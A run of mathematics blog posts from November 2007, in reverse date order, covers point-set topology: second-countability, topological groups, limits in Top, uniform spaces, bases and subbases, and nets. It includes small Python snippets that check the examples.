A stronger condition than first-countability is second-countability. This says that not only does every neighborhood filter have a countable base, but that there is a countable base for the topology as a whole. Clearly given any point $x$ we can take the sets in our base which contain $x$ and thus get a countable neighborhood base at that point, so any second-countable space is also first-countable, and thus sequential. Another nice thing about second-countable spaces is that they are “separable”. That is, in a second-countable space $X$ there will be a countable subset $S\subseteq X$ whose closure $\mathrm{Cl}(S)$ is all of $X$. That is, given any point $x\in X$ there is a sequence $x_i\in S$ — we don’t need nets because $X$ is sequential — so that $x_i$ converges to $x$. That is, in some sense we can “approximate” points of $X$ by sequences of points in $S$, and $S$ itself has only countably many points. The subcategory of all second-countable spaces is again countably complete, since subspaces and countable products of second-countable spaces are again second-countable. Again, we have coproducts, but not coequalizers since a quotient of a second-countable space may not be second-countable. However, if the map $X\rightarrow X/\sim$ sends open sets in $X$ to open sets in the quotient, then the quotient space is second-countable, so that’s not quite as bad as first-countability. Second-countability (and sometimes first-countability) is a property that makes a number of constructions work out a lot more easily, and which doesn’t really break too much. It’s a very common assumption since pretty much every space an algebraic topologist or a differential geometer will think of is second-countable. However, as is usually the case with such things, “most” spaces are not second-countable. Still, it’s a common enough assumption that we will usually take it as read, making explicit those times when we don’t assume that a space is second-countable. 
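For the real line (second-countable via the rational intervals) the separability claim is concrete: $\mathbb{Q}$ is a countable dense set, and decimal truncations supply the approximating sequence. A small sketch:

```python
from fractions import Fraction

# Approximate an arbitrary point by a sequence drawn from the countable
# dense subset Q: the k-digit decimal roundings.
target = 2 ** 0.5    # stand-in for an arbitrary real point
approx = [Fraction(round(target * 10 ** k), 10 ** k) for k in range(1, 10)]

# The sequence converges: the k-th term is within 10^-k of the target.
for k, q in enumerate(approx, start=1):
    assert abs(float(q) - target) <= 10.0 ** -k
```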
November 28, 2007 Topological Groups Now we’ve said a lot about the category $\mathbf{Top}$ of topological spaces and continuous maps between them. In particular we’ve seen that it’s complete and cocomplete — it has all limits and colimits. But we’ve still yet to see any good examples of topological spaces. That will change soon. First, though, I want to point out something we can do with these limits: we can define topological groups. Specifically, a topological group is a group object in the category of topological spaces. That is, it’s a topological space $G$ along with continuous functions $m:G\times G\rightarrow G$, $e:\{*\}\rightarrow G$, and $i:G\rightarrow G$ that satisfy the usual commutative diagrams. A morphism of topological groups is then just like a homomorphism of groups, but by a continuous function between the underlying topological spaces. Alternately we can think of it as a group to which we’ve added a topology so that the group operations are continuous. But as we’ve seen, a topological structure feels a bit floppier than a group structure, so it’s not really as easy to think of a “topology object” in a category. So we’ll start with $\mathbf{Top}$ and take group objects in there. Now it turns out that every topological group is a uniform space in at least two ways. We can declare the set $E_U=\{(x,y)|xy^{-1}\in U\}$ to be an entourage for any neighborhood $U$ of the identity, along with any subset of $G\times G$ containing such an $E_U$. Since any neighborhood of $e$ contains $e$ itself, each $E_U$ must contain the diagonal $\{(x,x)\}$. The intersection $E_U\cap E_V$ is the entourage $E_{U\cap V}$, and so this collection is closed under intersections. To see that $\bar{E}_U$ is an entourage, we must consider the inversion map. Any neighborhood $N$ of the identity contains an open set $U$ containing the identity. Then the preimage $i^{-1}(U)$ is just the “reflection” that sends each element of $U$ to its inverse, which must thus be open.
The reflection of $N$ contains the reflection of $U$, and is thus a neighborhood of the identity. Then $\bar{E}_U=\{(x,y)|yx^{-1}=(xy^{-1})^{-1}\in U\}$ is the same as $E_{i^{-1}(U)}$. Now, why must there be a “half-size” entourage? We’ll need to construct a half-size neighborhood of the identity. That is, a neighborhood $V$ so that the product of any two elements of $V$ lands in the neighborhood $U$. Then $(x,y)$ and $(y,z)$ in $E_V$ means that $xy^{-1}$ and $yz^{-1}$ are in $V$, and thus their product $xz^{-1}$ is in $U$, so $(x,z)\in E_U$. To construct this neighborhood $V$ let’s start by assuming $U$ is an open neighborhood by passing to an open subset of our neighborhood if necessary. Then its preimage $m^{-1}(U)$ is open in $G\times G$ by the continuity of $m$, and $U\times G$ and $G\times U$ will be open by the way we built the product topology. The intersection of these will be the collection of pairs $(x,y)\in G\times G$ with both $x$ and $y$ in $U$, and whose product also lands in $U$, and will be open as a finite intersection of open sets. We can project this set of pairs onto its first or second factor, and take the intersection of these two projections to get the open set $V$ which is our half-size neighborhood. The uniform structure we have constructed is called the right uniformity on $G$ because if we take any element $a\in G$ the function from $G$ to itself defined by right multiplication by $a$ — $x\mapsto m(x,a)$ — is uniformly continuous. Indeed, right multiplication sends an entourage $E_U=\{(x,y)|xy^{-1}\in U\}$ to itself, since the pair $(xa,ya)$ satisfies $xa(ya)^{-1}=xaa^{-1}y^{-1}=xy^{-1}\in U$. Left multiplication, on the other hand, sends a pair $(x,y)$ in $E_U$ to $(ax,ay)$, for which we have $ax(ay)^{-1}=axy^{-1}a^{-1}\in aUa^{-1}$. Thus to an entourage $E_U$ we can pick the entourage $E_{a^{-1}Ua}$. So left multiplication is also uniformly continuous, but not quite as easily.
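The two computations above can be machine-checked in a small nonabelian group. A sketch using $S_3$ as permutation tuples (the choice of group and of the set $U$ is just for illustration):

```python
from itertools import permutations

# S_3 as permutations of (0, 1, 2), with composition and inverse.
G = list(permutations(range(3)))
def mul(p, q):  # (p*q)(i) = p(q(i))
    return tuple(p[q[i]] for i in range(3))
def inv(p):
    r = [0] * 3
    for i, pi in enumerate(p):
        r[pi] = i
    return tuple(r)
e = (0, 1, 2)

# A "neighborhood of the identity": any subset containing e.
U = {e, (1, 0, 2)}
E_U = {(x, y) for x in G for y in G if mul(x, inv(y)) in U}

for a in G:
    # Right multiplication x -> xa maps E_U into E_U, since (xa)(ya)^-1 = xy^-1 ...
    assert all((mul(x, a), mul(y, a)) in E_U for (x, y) in E_U)
    # ... while left multiplication x -> ax maps E_{a^-1 U a} into E_U,
    # since a(xy^-1)a^-1 lands back in U when xy^-1 is in a^-1 U a.
    V = {mul(mul(inv(a), u), a) for u in U}
    E_V = {(x, y) for x in G for y in G if mul(x, inv(y)) in V}
    assert all((mul(a, x), mul(a, y)) in E_U for (x, y) in E_V)
```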
We could go through the same procedure to define the left uniformity which again swaps the roles of left and right multiplication. Note that the left and right uniformities need not be the same collection of entourages, but they define the same topology. Still, this doesn’t tell us how to get our hands on any topological groups to begin with, so here’s a way to do just that: start with an ordered group. That is, a set with the structures of both a group and a partial order so that if $a\leq b$ then $ga\leq gb$ and $ag\leq bg$. Using this translation invariance we can determine the order just by knowing which elements lie above the identity, for then $a\leq b$ if and only if $e\leq a^{-1}b$. The elements $x$ with $e\leq x$ form what we call the positive cone $G^+$. We can now use this to define a topology by declaring the positive cone to be closed. Then we’d like our translations to be homeomorphisms, so for each $a$ the set of $x$ with $a\leq x$ must also be closed. Similarly we want inversion to be a homeomorphism, and since it reverses the order we find that for each $a$ the set of $x$ with $x\leq a$ is closed. And then we can use the complements of all these as a subbase to generate a topology. This topology will in fact be uniform by everything we’ve done above. And, finally, one specific example. The field $\mathbb{Q}$ of rational numbers is an ordered group if we forget the multiplication. And thus we get a uniform topology on it, generated by the subbase of half-infinite sets. Specifically, for each rational number $a$ the set $(a,\infty)$ of all $x\in\mathbb{Q}$ with $a<x$, and the set $(-\infty,a)$ of all $x\in\mathbb{Q}$ with $x<a$, are declared open, and they generate the topology. A neighborhood of $0\in\mathbb{Q}$ will be any subset which contains one of the form $(-a,a)$. Since the group is abelian, both the left and the right uniformities coincide. For each rational number $a$ we have an entourage $E_a=\{(x,y)|-a<x-y<a\}$.
That is, a pair of rational numbers are in $E_a$ if they differ by less than $a$. November 27, 2007 Limits of Topological Spaces We’ve defined topological spaces and continuous maps between them. Together these give us a category $\mathbf{Top}$. We’d like to understand a few of our favorite categorical constructions as they work in this context. First off, the empty set $\varnothing$ has a unique topology, since it only has the one subset at all. Given any other space $X$ (we’ll omit explicit mention of its topology) there is a unique function $\varnothing\rightarrow X$, and it is continuous since the preimage of any subset of $X$ is empty. Thus $\varnothing$ is the initial object in $\mathbf{Top}$. On the other side, any singleton set $\{*\}$ also has a unique topology, since the only subsets are the whole set and the empty set, which must both be open. Given any other space $X$ there is a unique function $X\rightarrow\{*\}$, and it is continuous because the preimage of the empty set is empty and the preimage of the single point is the whole of $X$, both of which are open in $X$. Thus $\{*\}$ is a terminal object in $\mathbf{Top}$. Now for products. Given a family $X_\alpha$ of topological spaces indexed by $\alpha\in A$, we can form the product set $\prod\limits_{\alpha\in A}X_\alpha$, which comes with projection functions $\pi_\beta:\prod\limits_{\alpha\in A}X_\alpha\rightarrow X_\beta$ and satisfies a universal property. We want to use this same set and these same functions to describe the product in $\mathbf{Top}$, so we must choose our topology on the product set so that these projections will be continuous. Given an open set $U\subseteq X_\beta$, then, its preimage $\pi_\beta^{-1}(U)$ must be open in $\prod\limits_{\alpha\in A}X_\alpha$. Let’s take these preimages to be a subbase and consider the topology they generate.
If $X$ is any other space with a family of continuous maps $f_\alpha:X\rightarrow X_\alpha$, then the universal property in $\mathbf{Set}$ gives us a unique function $f:X\rightarrow\prod\limits_{\alpha\in A}X_\alpha$. But will it be a continuous map? To check this, remember that we only need to verify it on a subbase for the topology on the product space, and we have one ready to work with. Each set in the subbase is the preimage $\pi_\beta^{-1}(U)$ of an open set in some $X_\beta$, and then its preimage under $f$ is $f^{-1}(\pi_\beta^{-1}(U))=(\pi_\beta\circ f)^{-1}(U)=f_\beta^{-1}(U)$, which is open by the assumption that each $f_\beta$ is continuous. And so the product set equipped with the product topology described above is the categorical product of the topological spaces $X_\alpha$. What about coproducts? Let’s again start with the coproduct in $\mathbf{Set}$, which is the disjoint union $\biguplus\limits_{\alpha\in A}X_\alpha$, and which comes with canonical injections $\iota_\beta:X_\beta\rightarrow\biguplus\limits_{\alpha\in A}X_\alpha$. This time let’s jump right into the universal property, which says that given another space $X$ and functions $f_\alpha:X_\alpha\rightarrow X$, we have a unique function $f:\biguplus\limits_{\alpha\in A}X_\alpha\rightarrow X$. Now we need any function we get like this to be continuous. The preimage of an open set $U\subseteq X$ will be the union of the preimages of each of the $f_\alpha$, sitting inside the disjoint union. By choosing $X$, the $f_\alpha$, and $U$ judiciously, we can get the preimage $f_\alpha^{-1}(U)$ to be any open set we want in $X_\alpha$, so the open sets in the disjoint union should consist precisely of those subsets $V$ whose preimage $\iota_\alpha^{-1}(V)\subseteq X_\alpha$ is open for each $\alpha\in A$. It’s easy to verify that this collection is actually a topology, which then gives us the categorical coproduct in $\mathbf{Top}$. 
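For finite spaces the product construction can be carried out literally: generate the topology from the subbase of preimages, then check the projections come out continuous. A sketch on two toy two-point spaces (the spaces are made up for illustration):

```python
from itertools import combinations

def topology_from_subbase(X, subbase):
    """Coarsest topology on the finite set X containing `subbase`:
    close under finite intersections (giving a base), then under unions."""
    sets = [frozenset(s) for s in subbase]
    base = {frozenset(X)}             # empty intersection = whole space
    for r in range(1, len(sets) + 1):
        for combo in combinations(sets, r):
            base.add(frozenset(X).intersection(*combo))
    base = list(base)
    topo = set()
    for r in range(len(base) + 1):    # r = 0 gives the empty union = {}
        for combo in combinations(base, r):
            topo.add(frozenset().union(*combo))
    return topo

X = {0, 1};      TX = {frozenset(), frozenset({0}), frozenset(X)}
Y = {'a', 'b'};  TY = {frozenset(), frozenset({'a'}), frozenset(Y)}
P = {(x, y) for x in X for y in Y}
subbase = [{p for p in P if p[0] in u} for u in TX] + \
          [{p for p in P if p[1] in v} for v in TY]
TP = topology_from_subbase(P, subbase)

# The projections are continuous: preimages of opens are open.
assert all(frozenset(p for p in P if p[0] in u) in TP for u in TX)
assert all(frozenset(p for p in P if p[1] in v) in TP for v in TY)
```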
If we start with a topological space $X$ and take any subset $S\subseteq X$ then we can ask for the coarsest topology on $S$ that makes the inclusion map $i:S\rightarrow X$ continuous, sort of like how we defined the product topology above. The open sets in $S$ will be any set of the form $S\cap U$ for an open subset $U\subseteq X$. Then given another space $Y$, a function $f:Y\rightarrow S$ will be continuous if and only if $i\circ f:Y\rightarrow X$ is continuous. Indeed, the preimage $(i\circ f)^{-1}(U)=f^{-1}(S\cap U)$ clearly shows this equivalence. We call this the subspace topology on $S$. In particular, if we have two continuous maps $f:X\rightarrow Y$ and $g:X\rightarrow Y$, then we can consider the subspace $E\subseteq X$ consisting of those points $x\in X$ satisfying $f(x)=g(x)$. Given any other space $Z$ and a continuous map $h:Z\rightarrow X$ such that $f\circ h=g\circ h$, clearly $h$ sends all of $Z$ into the set $E$; the function $h$ factors as $e\circ h'$, where $e:E\rightarrow X$ is the inclusion map. Then $h'$ must be continuous because $h$ is, and so the subspace $E$ is the equalizer of the maps $f$ and $g$. Dually, given a topological space $X$ and an equivalence relation $\sim$ on the underlying set of $X$ we can define the quotient space $X/\sim$ to be the set of equivalence classes of points of $X$. This comes with a canonical function $p:X\rightarrow X/\sim$, which we want to be continuous. Further, we know that if $g:X\rightarrow Y$ is any function for which $x_1\sim x_2$ implies $g(x_1)=g(x_2)$, then $g$ factors as $g=g'\circ p$ for some function $g':X/\sim\rightarrow Y$. We want to define the topology on the quotient set so that $g$ is continuous if and only if $g'$ is. Given an open set $U\subseteq Y$, its preimage $g'^{-1}(U)$ is the set of equivalence classes that get sent into $U$, while its preimage $g^{-1}(U)$ is the set of all points that get sent to $U$.
And so we say a subset $V$ of the quotient space $X/\sim$ is open if and only if its preimage — the union of the equivalence classes in $V$ — is open in $X$. In particular, if we have two maps $f:Y\rightarrow X$ and $g:Y\rightarrow X$ we get an equivalence relation on $X$ by defining $x_1\sim x_2$ if there is a $y\in Y$ so that $f(y)=x_1$ and $g(y)=x_2$. If we walk through the above description of the quotient space we find that this construction gives us the coequalizer of $f$ and $g$. And now, the existence theorem for limits tells us that all limits and colimits exist in $\mathbf{Top}$. That is, the category of topological spaces is both complete and cocomplete. As a particularly useful example, let’s look at an example of a pushout. If we have two topological spaces $U$ and $V$ and a third space $A$ with maps $A\rightarrow U$ and $A\rightarrow V$ making $A$ into a subspace of both $U$ and $V$, then we can construct the pushout of $U$ and $V$ over $A$. The general rule is to first construct the coproduct of $U$ and $V$, and then pass to an appropriate coequalizer. That is, we take the disjoint union $U\uplus V$ and then identify the points in the copy of $A$ sitting inside $U$ with those in the copy of $A$ sitting inside $V$. That is, we get the union of $U$ and $V$, “glued” along $A$. November 26, 2007 Uniform Spaces Now let’s add a little more structure to our topological spaces. We can use a topology on a set to talk about which points are “close” to a subset. Now we want to make a finer comparison by being able to say “the point $a$ is closer to the subset $A$ than $y$ is to $B$.” We’ll do this with a technique similar to neighborhoods. But there we just defined a collection of neighborhoods for each point. Here we will define the neighborhoods of all of our points “uniformly” over the whole space.
To this end, we will equip our set $X$ with a family $\Upsilon$ of subsets of $X\times X$ called the “uniform structure” on our space, and the elements $E\in\Upsilon$ will be “entourages”. We will write $E[x]$ for the set of $y$ so that $(x,y)\in E$, and we want these sets to form a neighborhood filter for $x$ as $E$ varies over $\Upsilon$. Here we go:
• Every entourage $E$ contains the diagonal $\{(x,x)|x\in X\}$.
• If $E$ is an entourage and $E\subseteq F\subseteq X\times X$, then $F$ is an entourage.
• If $E$ and $F$ are entourages, then $E\cap F$ is an entourage.
• If $E$ is an entourage then there is another entourage $F$ so that $(x,y)\in F$ and $(y,z)\in F$ imply $(x,z)\in E$.
• If $E$ is an entourage then its reflection $\bar{E}=\{(y,x)|(x,y)\in E\}$ is also an entourage.
The first of these axioms says that $x\in E[x]$, as we’d hope for a neighborhood. The next two ensure that the collection of all the $E[x]$ forms a neighborhood filter for $x$, but it does so “uniformly” for all the $x\in X$ at once. This means that we can compare neighborhoods of two different points because each of them comes from an entourage, and we can compare the entourages. The fourth axiom is like the one I omitted from my discussion of neighborhoods; every collection of entourages gives rise to a topology, but topologies can only give back uniform structures satisfying this requirement. Finally, the last axiom gives the very reasonable condition that if $y\in E[x]$, then $x\in \bar{E}[y]$. That is, if one point is in a neighborhood of another, then the other point should be in a neighborhood of the first. Sometimes this requirement is omitted to get a “quasi-uniform space”. Now that we can compare closeness at different points, we can significantly enrich our concept of nets. Before now we talked about a net $x_\alpha$ converging to a point $x$ in the sense that the points $x_\alpha$ eventually got close to $x$.
But now we can talk about whether the points of the net are getting closer to each other. That is, for every entourage $E$ there is a $\gamma\in D$ so that for all $\alpha\geq\gamma$ and $\beta\geq\gamma$ the pair $(x_\alpha,x_\beta)$ is in $E$. In this case we say that the net is “Cauchy”. Now, if the full generality of nets still unnerves you, you can restrict to sequences. Then the condition is that there is some number $N$ so that for any two numbers $m$ and $n$ bigger than $N$ we have $x_m\in E[x_n]$. This gives us the notion of a Cauchy sequence, which some of you may already have heard of.

We can also enrich our notion of continuity. Before, we said that a function $f:X\rightarrow Y$ from a topological space defined by a neighborhood system $(X,\mathcal{N}_X)$ to another one $(Y,\mathcal{N}_Y)$ is continuous at a point $x\in X$ if each neighborhood $V\in\mathcal{N}_Y(f(x))$ contained the image $f(U)$ of some neighborhood $U\in\mathcal{N}_X(x)$, and we said that $f$ was continuous if it was continuous at every point of $X$. Now our uniform structures allow us to talk about neighborhoods of all points of a space together, so we can adapt our definition to work uniformly.

We say that a function $f:X\rightarrow Y$ from a uniform space $(X,\Upsilon_X)$ to another one $(Y,\Upsilon_Y)$ is uniformly continuous if for each entourage $F\in\Upsilon_Y$ there is some entourage $E\in\Upsilon_X$ that gets sent into $F$. More precisely, for every pair $(x_1,x_2)\in E$ the pair $(f(x_1),f(x_2))$ is in $F$. In particular, any neighborhood of a point $f(x)\in Y$ is of the form $F[f(x)]$ for some entourage $F\in\Upsilon_Y$. Then uniform continuity gives us an entourage $E\in\Upsilon_X$, and thus a neighborhood $E[x]$ which is sent into $F[f(x)]$. Thus uniform continuity implies continuity, but not necessarily the other way around.
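As a concrete sketch of these two definitions, here is a small numeric check (illustrative only; the sequence, the map, and the metric entourages $E_\epsilon=\{(x,y):|x-y|<\epsilon\}$ on the reals are my own choices, not from the post): $x_n=1/n$ is Cauchy, and the uniformly continuous map $t\mapsto\sqrt{t}$, which sends the entourage $E_{\epsilon^2}$ into $E_\epsilon$ because $|\sqrt{a}-\sqrt{b}|\le\sqrt{|a-b|}$, sends it to another Cauchy sequence.

```python
import math

def x(n):
    # x_n = 1/n, a standard Cauchy sequence in the metric uniformity on the reals
    return 1.0 / n

def cauchy_index(eps):
    """Return an index N witnessing the Cauchy condition for the entourage
    E_eps: all m, n > N give |x_m - x_n| < eps.  For x_n = 1/n we can take
    N = ceil(1/eps), since every pairwise distance on the tail is below
    1/(N+1) < eps."""
    N = math.ceil(1.0 / eps)
    tail = range(N + 1, N + 100)  # spot-check a finite stretch of the tail
    assert all(abs(x(m) - x(n)) < eps for m in tail for n in tail)
    return N

def image_cauchy_index(eps):
    """Uniform continuity of sqrt sends the entourage E_{eps^2} into E_eps
    (since |sqrt(a) - sqrt(b)| <= sqrt(|a - b|)), so the image sequence
    sqrt(x_n) is Cauchy, with the witness index taken from E_{eps^2}."""
    N = cauchy_index(eps * eps)
    tail = range(N + 1, N + 100)
    assert all(abs(math.sqrt(x(m)) - math.sqrt(x(n))) < eps
               for m in tail for n in tail)
    return N
```

For instance, `cauchy_index(0.1)` finds a single index past which all pairs of terms lie in $E_{0.1}$, and `image_cauchy_index(0.1)` finds one for the image sequence $\sqrt{x_n}$ in $E_{0.1}$.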
It is possible that a function is continuous, but that the only ways of picking neighborhoods to satisfy the definition do not come from entourages. These two extended definitions play well with each other too. Let's consider a uniformly continuous function $f:X\rightarrow Y$ and a Cauchy net $x_\alpha$ in $X$. Then I assert that the image $f(x_\alpha)$ of this net is again Cauchy. Indeed, for every entourage $F\in\Upsilon_Y$ we want a $\gamma$ so that $\alpha\geq\gamma$ and $\beta\geq\gamma$ imply that the pair $(f(x_\alpha),f(x_\beta))$ is in $F$. But uniform continuity gives us an entourage $E\in\Upsilon_X$ that gets sent into $F$, and the Cauchy property of our net gives us a $\gamma$ so that $(x_\alpha,x_\beta)\in E$ for all $\alpha$ and $\beta$ above $\gamma$. Then $(f(x_\alpha),f(x_\beta))\in F$ and we're done.

It wouldn't surprise me if one could turn this around like we did for neighborhoods. Given a map $f:X\rightarrow Y$ which is not uniformly continuous, use the uniform structure $\Upsilon_X$ as a directed set and construct a net on it which is Cauchy in $X$, but whose image is not Cauchy in $Y$. Then one could define uniform continuity as preservation of Cauchy nets and derive the other definition from it. However I've been looking at this conjecture for about an hour now and don't quite see how to prove it. So for now I'll just leave it, but if anyone else knows the right construction offhand I'd be glad to hear it.

November 23, 2007

Bases and Subbases

We've defined topologies by convergence of nets, by neighborhood systems, and by closure operators. In each case, we saw some additional hypothesis (sometimes more and sometimes less explicitly) to restrict which data actually corresponded to a topological space. That is, many neighborhood systems give rise to the same topology, which in turn induces only one of those neighborhood systems. Now let's turn back to our original definition of topology and see how we can weaken it in a similar way.
Remember that we defined the closure of a set $A$ in a topological space $(X,\tau)$ as the smallest closed set containing $A$. To get at it, we took the intersection of all the closed sets containing $A$. And we knew that at least one such closed set existed because the whole space $X$ was closed. We're going to do the exact same thing to come up with topologies.

So let's take a collection $\sigma\subseteq P(X)$ of subsets of $X$. We want the smallest collection $\tau\subseteq P(X)$ of subsets of $X$ that contains $\sigma$ and is a topology. To get at it, we consider all the topologies on $X$ that contain $\sigma$, and then take their intersection. As we saw back when we first defined topologies, this intersection will again be a topology, and it will be contained in any topology containing $\sigma$. And we know that we have at least one topology containing $\sigma$ because the discrete topology has all of $P(X)$ as its open sets.

Let's see how we can build up the topology $\tau$ from $\sigma$ more directly. What is it that prevents $\sigma$ from being a topology itself? Well, it might not be closed under taking arbitrary unions and finite intersections. So let's start with $\sigma$ and throw in all the unions of finite intersections of elements of $\sigma$. We'll use the convention that the union of no subsets of $X$ is the empty set $\varnothing$, while the intersection of no subsets of $X$ is the entire set $X$. This means we at least have $\varnothing$ and $X$ as unions of finite intersections. Now let's consider the intersection of two such sets.
That is, if we start with $\bigcup\limits_{a\in\mathcal{A}}\bigcap\limits_{i\in\mathcal{I}_a}U_{a,i}$ and $\bigcup\limits_{b\in\mathcal{B}}\bigcap\limits_{i\in\mathcal{I}_b}U_{b,i}$, then we get the intersection

$$\left(\bigcup\limits_{a\in\mathcal{A}}\bigcap\limits_{i\in\mathcal{I}_a}U_{a,i}\right)\cap\left(\bigcup\limits_{b\in\mathcal{B}}\bigcap\limits_{i\in\mathcal{I}_b}U_{b,i}\right)=\bigcup\limits_{a\in\mathcal{A}}\bigcup\limits_{b\in\mathcal{B}}\left(\bigcap\limits_{i\in\mathcal{I}_a}U_{a,i}\cap\bigcap\limits_{i\in\mathcal{I}_b}U_{b,i}\right)$$

which is again a union of finite intersections. Similarly, if we take an arbitrary union of these unions of finite intersections, we get another union of finite intersections. And any topology containing the sets in $\sigma$ must contain these sets. So this is exactly the topology generated by $\sigma$. In this case, we call $\sigma$ a subbase for the topology it generates.

“Subbase”? What happened to “base”? Well, a base for a topology is sort of halfway in between a subbase and a topology. First of all, we require that the elements of $\sigma$ cover $X$. That is, every point in $X$ shows up in at least one of the sets in $\sigma$. We also require that if $S_1$ and $S_2$ are in $\sigma$ and $x\in S_1\cap S_2$ then there is some $S_3$ in $\sigma$ with $x\in S_3\subseteq S_1\cap S_2$. Thus we can write the intersection of any two elements of $\sigma$ as a union of other elements of $\sigma$. The covering property says that we can write the empty intersection as a union as well. And so we don't need to take any intersections at all, only unions. That is, a base $\beta$ for a topology $\tau$ on a set $X$ is a collection of subsets of $X$ so that every subset in $\tau$ is a union of subsets in $\beta$. In particular, if we start with any collection of sets $\sigma$ and throw in all the finite intersections of subsets in $\sigma$ we get a base for the topology generated by $\sigma$.
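To make the subbase-to-topology construction concrete, here is a brute-force sketch on a made-up four-point set (the set and the subbase are my own toy choices): first close under finite intersections to get a base, then take all unions.

```python
from itertools import chain, combinations

# A made-up four-point set and subbase, purely for illustration.
X = frozenset({1, 2, 3, 4})
sigma = [frozenset({1, 2}), frozenset({2, 3}), frozenset({4})]

def generated_topology(X, sigma):
    # Step 1: the base -- all finite intersections of subbase elements.
    # By convention the empty intersection is X itself.
    base = {X}
    for r in range(1, len(sigma) + 1):
        for combo in combinations(sigma, r):
            inter = X
            for s in combo:
                inter = inter & s
            base.add(inter)
    # Step 2: the topology -- all unions of base elements.
    # By convention the empty union is the empty set.
    base = list(base)
    tau = set()
    for pick in chain.from_iterable(combinations(base, r)
                                    for r in range(len(base) + 1)):
        tau.add(frozenset().union(*pick))
    return tau

tau = generated_topology(X, sigma)
```

On a finite set there are only finitely many unions, so “arbitrary unions” reduces to this enumeration; the result contains $\varnothing$, $X$, and $\sigma$, and is closed under unions and finite intersections.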
Probably the nicest thing about defining a topology with a subbase is that the subbase is all we need to check continuity. More explicitly: let $\sigma\subseteq P(Y)$ be a subbase generating a topology $\tau_Y$ on a set $Y$, and let $(X,\tau_X)$ be any topological space. Then we have defined a function $f:X\rightarrow Y$ to be continuous if $f^{-1}(U)\in\tau_X$ for each $U\in\tau_Y$. What I'm asserting here is that we can weaken this to say that $U\in\sigma$ implies $f^{-1}(U)\in\tau_X$. For then any set in $\tau_Y$ is the union of finite intersections of sets in $\sigma$, and the preimage of such a set is then the union of the finite intersections of the preimages of the sets in $\sigma$. So if these are all open, so will be the preimage of every set in $\tau_Y$.

November 22, 2007

Nets and Continuity

Okay, so why have we been talking about nets? Because continuous functions look great in terms of nets! First I'll give you the answer: a function $f:X\rightarrow Y$ is continuous if and only if $f(\lim\Phi)=\lim f\circ\Phi$. To be a little more clear, let's write $x_\alpha=\Phi(\alpha)$ for $\alpha\in D$. Then $\lim f(x_\alpha)=f(\lim x_\alpha)$. That is, a continuous function preserves the limits (and more generally the accumulation points) of all nets. Now this looks a lot more like algebra than that messy business of pulling back open sets!

We can even get a little finer and say that a function $f:X\rightarrow Y$ is continuous at a point $x\in X$ if every net in $X$ that converges to $x$ gets sent to a net in $Y$ converging to $f(x)$. Then we say that a function is continuous if it is continuous at all points of $X$. This should remind us of how we defined continuity at a point by using neighborhood systems, and so we'll show the equivalence of that definition of continuity and our new one. So, let $X$ and $Y$ have the neighborhood systems $\mathcal{N}_X$ and $\mathcal{N}_Y$, respectively.
We'll assume that for every neighborhood $V\in\mathcal{N}_Y(f(x))$ there is a neighborhood $U\in\mathcal{N}_X(x)$ with $f(U)\subseteq V$. Now if we take a net $x_\alpha$ converging to $x$, we must show that $f(x_\alpha)$ is eventually in $V$ for all $V\in\mathcal{N}_Y(f(x))$. But for each such neighborhood of $f(x)$ we have a neighborhood $U\in\mathcal{N}_X(x)$, and we know that $x_\alpha$ is eventually in $U$. Then $f(x_\alpha)$ must be eventually in $f(U)\subseteq V$, and so $f(x_\alpha)$ converges to $f(x)$.

On the other hand, let's suppose that there is some neighborhood $N$ of $f(x)$ so that the image of no neighborhood of $x$ fits completely into $N$. We'll construct a net converging to $x$, but whose image doesn't converge to $f(x)$. For our directed set we take the neighborhood filter $\mathcal{N}(x)$ itself, ordered by inclusion. That is, $U\geq V$ if $U\subseteq V$. Then since $f(U)\nsubseteq N$ there must be some point $x_U\in U$ with $f(x_U)\notin N$. We pick any such point as the value of our net at $U$. Clearly the net $x_U$ is eventually in every neighborhood of $x$, and so the net converges to $x$. But just as clearly, since $f(x_U)$ is not eventually in $N$, the image net can't converge to $f(x)$.

So nets give us a very “algebraic” picture of topological spaces. A topological space is a set $X$ equipped with a (partially-defined) rule that sends every convergent net $\Phi:D\rightarrow X$ to its limit point in $X$, and continuous maps are those which preserve this rule. Still, there's something different here. Since taking the limit only works on some nets, this “preservation” is to be read in a more logical sense: if the net converges then the image net converges, and we know the answer. However, the image net could easily converge without the original net converging, and then we have no idea what its limit is.
This is in contradistinction to the case for algebraic structures, where the algebraic operations are always defined and the connection between source and target structures feels a lot tighter. There's also a tantalizing connection to category theory, in that our directed sets are categories of a sort. Clearly I'd like to think of a net as some sort of functor, and the limit of a net as being the limit of this functor. But I don't really see what the target category should be. I could take objects to be points of $X$, but then what are the morphisms? And if the objects aren't points of $X$, what are they? How does this process of taking a limit correspond to the categorical one?

November 21, 2007

Nets, Part II

Okay, let's pick up our characterization of topologies with nets by, well, actually using them to characterize a topology. First we're going to need yet another way of looking at the points in the closure of a set. Here goes: a point $x$ is in $\mathrm{Cl}(A)$ if and only if every open neighborhood of $x$ has a nonempty intersection with $A$. To see this, remember that the closure of $A$ is the complement of the interior of the complement of $A$. And we defined the interior of the complement of $A$ as the set of points that have at least one open neighborhood completely contained in the complement of $A$. And so the closure of $A$ is the set of points that have no open neighborhoods completely contained in the complement of $A$. So they all touch $A$ somewhere. Cool?

Okay, so let's kick it up to nets. The closure $\mathrm{Cl}(A)$ consists of exactly the accumulation points of nets in $A$. Well, since we know that every accumulation point of a net is the limit of some subnet, we can equivalently say that $\mathrm{Cl}(A)$ consists of the limit points of nets in $A$. So for every point in $\mathrm{Cl}(A)$ we need a net converging to it, and conversely we need to show that the limit of any convergent net in $A$ lands in $\mathrm{Cl}(A)$.
